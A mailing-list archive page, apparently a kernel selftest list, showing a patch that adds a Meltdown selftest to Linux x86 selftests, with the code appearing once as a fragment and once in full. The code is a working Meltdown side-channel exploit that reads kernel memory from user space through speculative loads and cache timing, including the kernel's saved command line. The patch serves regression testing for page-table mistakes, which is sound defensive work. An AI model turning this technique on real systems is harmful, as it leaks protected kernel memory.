get_access_time(target_array); + + for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++) + cached += get_access_time(target_array); + + for (uncached = 0, i = 0; i < ESTIMATE_CYCLES; i++) { + clflush(target_array); + uncached += get_access_time(target_array); + } + + cached /= ESTIMATE_CYCLES; + uncached /= ESTIMATE_CYCLES; + + cache_hit_threshold = mysqrt(cached * uncached); + + printf("[INFO]\taccess time: cached = %ld, uncached = %ld, threshold = %d\n", + cached, uncached, cache_hit_threshold); +} + +static unsigned long find_symbol_in_file(const char *filename, const char *symname) +{ + unsigned long addr; + char type, *buf; + int found; + FILE *fp; + + fp = fopen(filename, "r"); + if (!fp) { + printf("[INFO]\tFailed to open %s\n", filename); + return 0; + } + + buf = malloc(4096); + if (!buf) + return 0; + + found = 0; + while (fscanf(fp, "%lx %c %s\n", &addr, &type, buf)) { + if (!strcmp(buf, symname)) { + found = 1; + break; + } + } + + free(buf); + fclose(fp); + + return found ? addr : 0; +} + +static unsigned long find_kernel_symbol(const char *name) +{ + char systemmap[256]; + struct utsname utsname; + unsigned long addr; + + addr = find_symbol_in_file("/proc/kallsyms", name); + if (addr) + return addr; + + if (uname(&utsname) < 0) + return 0; + sprintf(systemmap, "/boot/System.map-%s", utsname.release); + addr = find_symbol_in_file(systemmap, name); + return addr; +} + +static unsigned long saved_cmdline_addr; +static int spec_fd; + +#define READ_SIZE 32 + +static int test_read_saved_command_line(void) +{ + unsigned int i, score = 0, ret; + unsigned long addr; + unsigned long size; + char read[READ_SIZE] = { 0 }; + char expected[READ_SIZE] = { 0 }; + int expected_len; + + saved_cmdline_addr = find_kernel_symbol("saved_command_line"); + if (!saved_cmdline_addr) { + printf("[SKIP]\tCan not find symbol saved_command_line\n"); + return 0; + } + printf("[INFO]\tsaved_cmdline_addr: 0x%lx\n", saved_cmdline_addr); + + spec_fd = open("/proc/cmdline", O_RDONLY); + if (spec_fd == -1) { + printf("[SKIP]\tCan not open /proc/cmdline\n"); + return 0; + } + + expected_len = pread(spec_fd, expected, sizeof(expected), 0); + if (expected_len < 0) { + printf("[SKIP]\tCan't read /proc/cmdline\n"); + return 0; + } + + /* read address of saved_cmdline_addr */ + addr = saved_cmdline_addr; + size = sizeof(addr); + for (i = 0; i < size; i++) { + ret = readbyte(spec_fd, addr); + read[i] = ret; + addr++; + } + + /* read value pointed to by saved_cmdline_addr */ + memcpy(&addr, read, sizeof(addr)); + memset(read, 0, sizeof(read)); + printf("[INFO]\tsaved_command_line: 0x%lx\n", addr); + size = expected_len; + + if (!addr) + goto done; + + for (i = 0; i < size; i++) { + ret = readbyte(spec_fd, addr); + read[i] = ret; + addr++; + } + + for (i = 0; i < size; i++) + if (expected[i] == read[i]) + score++; + +done: + if (score > size / 2) { + printf("[FAIL]\ttest_read_saved_command_line: both high and low kernel mapping leak found.\n"); + ret = -1; + } else { + printf("[OK]\ttest_read_saved_command_line: no leak found.\n"); + ret = 0; + } + + close(spec_fd); + + return ret; +} + +static int get_directmap_base(void) +{ + char *buf; + FILE *fp; + size_t n; + int ret; + + fp = fopen("/sys/kernel/debug/page_tables/kernel", "r"); + if (!fp) + return -1; + + buf = NULL; + ret = -1; + while (getline(&buf, &n, fp) != -1) { + if (!strstr(buf, "Kernel Mapping")) + continue; + + if (getline(&buf, &n, fp) != -1 && + sscanf(buf, "0x%lx", &directmap_base) == 1) { + printf("[INFO]\tdirectmap_base=0x%lx/0x%lx\n", directmap_base, directmap_base & PUD_MASK); + directmap_base &= PUD_MASK; + ret = 0; + break; + } + } + + fclose(fp); + free(buf); + return ret; +} + +static int virt_to_phys(unsigned long virt, unsigned long *phys) +{ + unsigned long pfn; + uint64_t val; + int fd, ret; + + fd = open("/proc/self/pagemap", O_RDONLY); + if (fd == -1) { + printf("[INFO]\tFailed to open pagemap\n"); + return -1; + } + + ret = pread(fd, &val, sizeof(val), (virt >> PAGE_SHIFT) * sizeof(uint64_t)); + if (ret == -1) { + printf("[INFO]\tFailed to read pagemap\n"); + goto out; + } + + if (!(val & (1ULL << 63))) { + printf("[INFO]\tPage not present according to pagemap\n"); + ret = -1; + goto out; + } + + pfn = val & ((1ULL << 55) - 1); + if (pfn == 0) { + printf("[INFO]\tNeed CAP_SYS_ADMIN to show pfn\n"); + ret = -1; + goto out; + } + + ret = 0; + *phys = (pfn << PAGE_SHIFT) | (virt & (PAGE_SIZE - 1)); + +out: + close(fd); + return ret; +} + +static int test_read_local_var(void) +{ + char path[] = "/tmp/meltdown.XXXXXX"; + char string[] = "test string"; + unsigned long phys; + int i, len, ret; + char *result; + void *p; + + if (get_directmap_base() == -1) { + printf("[SKIP]\tFailed to get directmap base. Need root and CONFIG_PTDUMP_DEBUGFS\n"); + return 0; + } + + spec_fd = mkstemp(path); + if (spec_fd == -1) { + printf("[SKIP]\tCan not open %s\n", path); + return 0; + } + ftruncate(spec_fd, 0x1000); + + p = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, spec_fd, 0); + if (p == MAP_FAILED) { + printf("[SKIP]\tmmap spec_fd failed\n"); + return 0; + } + memcpy(p, string, sizeof(string)); + + if (virt_to_phys((unsigned long)p, &phys) == -1) { + printf("[SKIP]\tCan not convert virtual address to physical address\n"); + return 0; + } + + len = strlen(string); + result = malloc(len + 1); + if (!result) { + printf("[SKIP]\tNot enough memory for malloc\n"); + return 0; + } + memset(result, 0, len + 1); + + for (i = 0; i < len; i++, phys++) { + result[i] = readbyte(spec_fd, directmap_base + phys); + if (result[i] == 0) + break; + } + + ret = !strncmp(string, result, len); + if (ret) + printf("[FAIL]\ttest_read_local_var: low kernel mapping leak found.\n"); + else + printf("[OK]\ttest_read_local_var: no leak found.\n"); + + free(result); + munmap(p, 0x1000); + close(spec_fd); + + return ret; +} + +int main(void) +{ + int ret1, ret2; + + printf("[RUN]\tTest if system is vulnerable to meltdown\n"); + + set_cache_hit_threshold(); + + memset(target_array, 1, sizeof(target_array)); + + if (set_signal() < 0) { + printf("[SKIP]\tCan not set handler for segfault\n"); + return 0; + } + + ret1 = test_read_local_var(); + ret2 = test_read_saved_command_line(); + + if (ret1 || ret2) + return -1; + + return 0; +} -- 2.39.0

1 year, 11 months

1
0
0 0

[PATCH] selftest/x86/meltdown: Add a selftest for meltdown

by Aaron Lu

To capture potential programming errors like mistakenly setting Global bit on kernel page table entries, a selftest for meltdown is added. This selftest is based on Pavel Boldin's work at: https://github.com/linux-test-project/ltp/blob/master/testcases/cve/meltdow… In addition to the existing test of reading kernel variable saved_command_line from user space, one more test of reading user local variable through kernel direct map address is added. For the existing test(reading saved_command_line) to report a failure, both the high kernel mapping and low kernel mapping have to be in leaked state; For the added test(read local var), only low kernel mapping leak is enough to trigger a test fail, so both tests are useful. Test results of 10 runs: On v6.1-rc8 with nopti kernel cmdline option: host test_out_rate_1 test_out_rate_2 lkp-bdw-de1 50% 100% lkp-hsw-d01 70% 100% lkp-hsw-d02 0% 80% lkp-hsw-d03 60% 100% lkp-hsw-d04 20% 100% lkp-hsw-d05 60% 100% lkp-ivb-d01 0% 70% lkp-kbl-d01 100% 100% lkp-skl-d02 100% 90% lkp-skl-d03 90% 100% lkp-skl-d05 60% 100% kbl-vm 100% 80% 2 other machines have 0% rate for both tests. bdw=broadwell, hsw=haswell, ivb=ivybridge, etc. test_out_rate_1: test reports fail rate for the test of reading saved_command_line from user space; test_out_rate_2: test reports fail rate for the test of reading user local variable through kernel direct map address in user space. On v5.19 without nopti cmdline option: host test_out_rate_2 lkp-bdw-de1 80% lkp-hsw-4ex1 50% lkp-hsw-d01 30% lkp-hsw-d03 10% lkp-hsw-d04 10% lkp-kbl-d01 10% kbl-vm 80% 7 other machines have 0% rate for test2. Also tested on an i386 VM with 512M memory and the test out rate is 100% when adding nopti to kernel cmdline with v6.1-rc8. Main changes I made from Pavel Boldin's meltdown test are: - Replace rdtscll() and clflush() with kernel's implementation; - Reimplement find_symbol_in_file() to avoid bringing in LTP's library functions; - Coding style changes: placing the function return type in the same line of the function. Signed-off-by: Aaron Lu <aaron.lu(a)intel.com> --- Notable changes from RFC v3: - Drop RFC tag; - Change the base code from zlib licensed one to GPL licensed one. tools/testing/selftests/x86/Makefile | 2 +- tools/testing/selftests/x86/meltdown.c | 529 +++++++++++++++++++++++++ 2 files changed, 530 insertions(+), 1 deletion(-) create mode 100644 tools/testing/selftests/x86/meltdown.c diff --git a/tools/testing/selftests/x86/Makefile b/tools/testing/selftests/x86/Makefile index 0388c4d60af0..36f99c360a56 100644 --- a/tools/testing/selftests/x86/Makefile +++ b/tools/testing/selftests/x86/Makefile @@ -13,7 +13,7 @@ CAN_BUILD_WITH_NOPIE := $(shell ./check_cc.sh "$(CC)" trivial_program.c -no-pie) TARGETS_C_BOTHBITS := single_step_syscall sysret_ss_attrs syscall_nt test_mremap_vdso \ check_initial_reg_state sigreturn iopl ioperm \ test_vsyscall mov_ss_trap \ - syscall_arg_fault fsgsbase_restore sigaltstack + syscall_arg_fault fsgsbase_restore sigaltstack meltdown TARGETS_C_32BIT_ONLY := entry_from_vm86 test_syscall_vdso unwind_vdso \ test_FCMOV test_FCOMI test_FISTTP \ vdso_restorer diff --git a/tools/testing/selftests/x86/meltdown.c b/tools/testing/selftests/x86/meltdown.c new file mode 100644 index 000000000000..fcb211dc9038 --- /dev/null +++ b/tools/testing/selftests/x86/meltdown.c @@ -0,0 +1,529 @@ +// SPDX-License-Identifier: GPL-2.0-or-later +/* + * Copyright (c) 2018 Pavel Boldin <pboldin(a)cloudlinux.com> + * https://github.com/linux-test-project/ltp/blob/master/testcases/cve/meltdow… + */ + +#define _GNU_SOURCE +#include <stdio.h> +#include <stdlib.h> +#include <stdint.h> +#include <stdarg.h> +#include <string.h> +#include <signal.h> +#include <ucontext.h> +#include <unistd.h> +#include <fcntl.h> +#include <ctype.h> +#include <sys/utsname.h> +#include <sys/mman.h> + +#define PAGE_SHIFT 12 +#define PAGE_SIZE 0x1000 +#define PUD_SHIFT 30 +#define PUD_SIZE (1UL << PUD_SHIFT) +#define PUD_MASK (~(PUD_SIZE - 1)) + +size_t cache_miss_threshold; +unsigned long directmap_base; + +#define TARGET_OFFSET 9 +#define TARGET_SIZE (1 << TARGET_OFFSET) +#define BITS_BY_READ 2 + +static inline uint64_t rdtsc(void) +{ + uint32_t eax, edx; + uint64_t tsc_val; + /* + * The lfence is to wait (on Intel CPUs) until all previous + * instructions have been executed. If software requires RDTSC to be + * executed prior to execution of any subsequent instruction, it can + * execute LFENCE immediately after RDTSC + * */ + __asm__ __volatile__("lfence; rdtsc; lfence" : "=a"(eax), "=d"(edx)); + tsc_val = ((uint64_t)edx) << 32 | eax; + return tsc_val; +} + +static inline void clflush(volatile void *__p) +{ + asm volatile("clflush %0" : "+m" (*(volatile char *)__p)); +} + +static char target_array[BITS_BY_READ * TARGET_SIZE]; + +static void clflush_target(void) +{ + int i; + + for (i = 0; i < BITS_BY_READ; i++) + clflush(&target_array[i * TARGET_SIZE]); +} + +extern char failshere[]; +extern char stopspeculate[]; + +static void __attribute__((noinline)) speculate(unsigned long addr, char bit) +{ + register char mybit asm ("cl") = bit; +#ifdef __x86_64__ + asm volatile ( + "1:\n\t" + + ".rept 300\n\t" + "add $0x141, %%rax\n\t" + ".endr\n" + + "failshere:\n\t" + "movb (%[addr]), %%al\n\t" + "ror %[bit], %%rax\n\t" + "and $1, %%rax\n\t" + "shl $9, %%rax\n\t" + "jz 1b\n\t" + + "movq (%[target], %%rax, 1), %%rbx\n" + + "stopspeculate: \n\t" + "nop\n\t" + : + : [target] "r" (target_array), + [addr] "r" (addr), + [bit] "r" (mybit) + : "rax", "rbx" + ); +#else /* defined(__x86_64__) */ + asm volatile ( + "1:\n\t" + + ".rept 300\n\t" + "add $0x141, %%eax\n\t" + ".endr\n" + + "failshere:\n\t" + "movb (%[addr]), %%al\n\t" + "ror %[bit], %%eax\n\t" + "and $1, %%eax\n\t" + "shl $9, %%eax\n\t" + "jz 1b\n\t" + + "movl (%[target], %%eax, 1), %%ebx\n" + + "stopspeculate: \n\t" + "nop\n\t" + : + : [target] "r" (target_array), + [addr] "r" (addr), + [bit] "r" (mybit) + : "rax", "ebx" + ); +#endif +} + +#ifdef __i386__ +# define REG_RIP REG_EIP +#endif + +static void sigsegv(int sig, siginfo_t *siginfo, void *context) +{ + ucontext_t *ucontext = context; + unsigned long *prip = (unsigned long *)&ucontext->uc_mcontext.gregs[REG_RIP]; + if (*prip != (unsigned long)failshere) { + printf("Segmentation fault at unexpected location %lx\n", *prip); + abort(); + } + *prip = (unsigned long)stopspeculate; + return; +} + +static int set_signal(void) +{ + struct sigaction act = { + .sa_sigaction = sigsegv, + .sa_flags = SA_SIGINFO, + }; + + return sigaction(SIGSEGV, &act, NULL); +} + +static inline int get_access_time(volatile char *addr) +{ + unsigned long long time1, time2; + volatile int j __attribute__((__unused__)); + + time1 = rdtsc(); + j = *addr; + time2 = rdtsc(); + + return time2 - time1; +} + +static int cache_hit_threshold; +static int hist[BITS_BY_READ]; + +static void check(void) +{ + int i, time; + volatile char *addr; + + for (i = 0; i < BITS_BY_READ; i++) { + addr = &target_array[i * TARGET_SIZE]; + + time = get_access_time(addr); + + if (time <= cache_hit_threshold) + hist[i]++; + } +} + +#define CYCLES 10000 +static int readbit(int fd, unsigned long addr, char bit) +{ + int i, ret; + static char buf[256]; + + memset(hist, 0, sizeof(hist)); + + for (i = 0; i < CYCLES; i++) { + /* + * Make the to-be-stolen data cache and tlb hot + * to increase success rate. + */ + ret = pread(fd, buf, sizeof(buf), 0); + if (ret < 0) + printf("[INFO]\tCan't read fd"); + + clflush_target(); + + speculate(addr, bit); + check(); + } + + if (hist[1] > CYCLES / 10) + return 1; + return 0; +} + +static int readbyte(int fd, unsigned long addr) +{ + int bit, res = 0; + + for (bit = 0; bit < 8; bit ++ ) + res |= (readbit(fd, addr, bit) << bit); + + return res; +} + +static int mysqrt(long val) +{ + int root = val / 2, prevroot = 0, i = 0; + + while (prevroot != root && i++ < 100) { + prevroot = root; + root = (val / root + root) / 2; + } + + return root; +} + +#define ESTIMATE_CYCLES 1000000 +static void set_cache_hit_threshold(void) +{ + long cached, uncached, i; + + for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++) + cached += get_access_time(target_array); + + for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++) + cached += get_access_time(target_array); + + for (uncached = 0, i = 0; i < ESTIMATE_CYCLES; i++) { + clflush(target_array); + uncached += get_access_time(target_array); + } + + cached /= ESTIMATE_CYCLES; + uncached /= ESTIMATE_CYCLES; + + cache_hit_threshold = mysqrt(cached * uncached); + + printf("[INFO]\taccess time: cached = %ld, uncached = %ld, threshold = %d\n", + cached, uncached, cache_hit_threshold); +} + +static unsigned long find_symbol_in_file(const char *filename, const char *symname) +{ + unsigned long addr; + char type, *buf; + int found; + FILE *fp; + + fp = fopen(filename, "r"); + if (!fp) { + printf("[INFO]\tFailed to open %s\n", filename); + return 0; + } + + buf = malloc(4096); + if (!buf) + return 0; + + found = 0; + while (fscanf(fp, "%lx %c %s\n", &addr, &type, buf)) { + if (!strcmp(buf, symname)) { + found = 1; + break; + } + } + + free(buf); + fclose(fp); + + return found ? addr : 0; +} + +static unsigned long find_kernel_symbol(const char *name) +{ + char systemmap[256]; + struct utsname utsname; + unsigned long addr; + + addr = find_symbol_in_file("/proc/kallsyms", name); + if (addr) + return addr; + + if (uname(&utsname) < 0) + return 0; + sprintf(systemmap, "/boot/System.map-%s", utsname.release); + addr = find_symbol_in_file(systemmap, name); + return addr; +} + +static unsigned long saved_cmdline_addr; +static int spec_fd; + +#define READ_SIZE 32 + +static int test_read_saved_command_line(void) +{ + unsigned int i, score = 0, ret; + unsigned long addr; + unsigned long size; + char read[READ_SIZE] = { 0 }; + char expected[READ_SIZE] = { 0 }; + int expected_len; + + saved_cmdline_addr = find_kernel_symbol("saved_command_line"); + if (!saved_cmdline_addr) { + printf("[SKIP]\tCan not find symbol saved_command_line\n"); + return 0; + } + printf("[INFO]\tsaved_cmdline_addr: 0x%lx\n", saved_cmdline_addr); + + spec_fd = open("/proc/cmdline", O_RDONLY); + if (spec_fd == -1) { + printf("[SKIP]\tCan not open /proc/cmdline\n"); + return 0; + } + + expected_len = pread(spec_fd, expected, sizeof(expected), 0); + if (expected_len < 0) { + printf("[SKIP]\tCan't read /proc/cmdline\n"); + return 0; + } + + /* read address of saved_cmdline_addr */ + addr = saved_cmdline_addr; + size = sizeof(addr); + for (i = 0; i < size; i++) { + ret = readbyte(spec_fd, addr); + read[i] = ret; + addr++; + } + + /* read value pointed to by saved_cmdline_addr */ + memcpy(&addr, read, sizeof(addr)); + memset(read, 0, sizeof(read)); + printf("[INFO]\tsaved_command_line: 0x%lx\n", addr); + size = expected_len; + + if (!addr) + goto done; + + for (i = 0; i < size; i++) { + ret = readbyte(spec_fd, addr); + read[i] = ret; + addr++; + } + + for (i = 0; i < size; i++) + if (expected[i] == read[i]) + score++; + +done: + if (score > size / 2) { + printf("[FAIL]\ttest_read_saved_command_line: both high and low kernel mapping leak found.\n"); + ret = -1; + } else { + printf("[OK]\ttest_read_saved_command_line: no leak found.\n"); + ret = 0; + } + + close(spec_fd); + + return ret; +} + +static int get_directmap_base(void) +{ + char *buf; + FILE *fp; + size_t n; + int ret; + + fp = fopen("/sys/kernel/debug/page_tables/kernel", "r"); + if (!fp) + return -1; + + buf = NULL; + ret = -1; + while (getline(&buf, &n, fp) != -1) { + if (!strstr(buf, "Kernel Mapping")) + continue; + + if (getline(&buf, &n, fp) != -1 && + sscanf(buf, "0x%lx", &directmap_base) == 1) { + printf("[INFO]\tdirectmap_base=0x%lx/0x%lx\n", directmap_base, directmap_base & PUD_MASK); + directmap_base &= PUD_MASK; + ret = 0; + break; + } + } + + fclose(fp); + free(buf); + return ret; +} + +static int virt_to_phys(unsigned long virt, unsigned long *phys) +{ + unsigned long pfn; + uint64_t val; + int fd, ret; + + fd = open("/proc/self/pagemap", O_RDONLY); + if (fd == -1) { + printf("[INFO]\tFailed to open pagemap\n"); + return -1; + } + + ret = pread(fd, &val, sizeof(val), (virt >> PAGE_SHIFT) * sizeof(uint64_t)); + if (ret == -1) { + printf("[INFO]\tFailed to read pagemap\n"); + goto out; + } + + if (!(val & (1ULL << 63))) { + printf("[INFO]\tPage not present according to pagemap\n"); + ret = -1; + goto out; + } + + pfn = val & ((1ULL << 55) - 1); + if (pfn == 0) { + printf("[INFO]\tNeed CAP_SYS_ADMIN to show pfn\n"); + ret = -1; + goto out; + } + + ret = 0; + *phys = (pfn << PAGE_SHIFT) | (virt & (PAGE_SIZE - 1)); + +out: + close(fd); + return ret; +} + +static int test_read_local_var(void) +{ + char path[] = "/tmp/meltdown.XXXXXX"; + char string[] = "test string"; + unsigned long phys; + int i, len, ret; + char *result; + void *p; + + if (get_directmap_base() == -1) { + printf("[SKIP]\tFailed to get directmap base. Need root and CONFIG_PTDUMP_DEBUGFS\n"); + return 0; + } + + spec_fd = mkstemp(path); + if (spec_fd == -1) { + printf("[SKIP]\tCan not open %s\n", path); + return 0; + } + ftruncate(spec_fd, 0x1000); + + p = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, spec_fd, 0); + if (p == MAP_FAILED) { + printf("[SKIP]\tmmap spec_fd failed\n"); + return 0; + } + memcpy(p, string, sizeof(string)); + + if (virt_to_phys((unsigned long)p, &phys) == -1) { + printf("[SKIP]\tCan not convert virtual address to physical address\n"); + return 0; + } + + len = strlen(string); + result = malloc(len + 1); + if (!result) { + printf("[SKIP]\tNot enough memory for malloc\n"); + return 0; + } + memset(result, 0, len + 1); + + for (i = 0; i < len; i++, phys++) { + result[i] = readbyte(spec_fd, directmap_base + phys); + if (result[i] == 0) + break; + } + + ret = !strncmp(string, result, len); + if (ret) + printf("[FAIL]\ttest_read_local_var: low kernel mapping leak found.\n"); + else + printf("[OK]\ttest_read_local_var: no leak found.\n"); + + free(result); + munmap(p, 0x1000); + close(spec_fd); + + return ret; +} + +int main(void) +{ + int ret1, ret2; + + printf("[RUN]\tTest if system is vulnerable to meltdown\n"); + + set_cache_hit_threshold(); + + memset(target_array, 1, sizeof(target_array)); + + if (set_signal() < 0) { + printf("[SKIP]\tCan not set handler for segfault\n"); + return 0; + } + + ret1 = test_read_local_var(); + ret2 = test_read_saved_command_line(); + + if (ret1 || ret2) + return -1; + + return 0; +} -- 2.39.0

1 year, 11 months

6
15
0 0

2024

2023

2022

2021

2020

2019

2018

2017

Linux-kselftest-mirror January 2023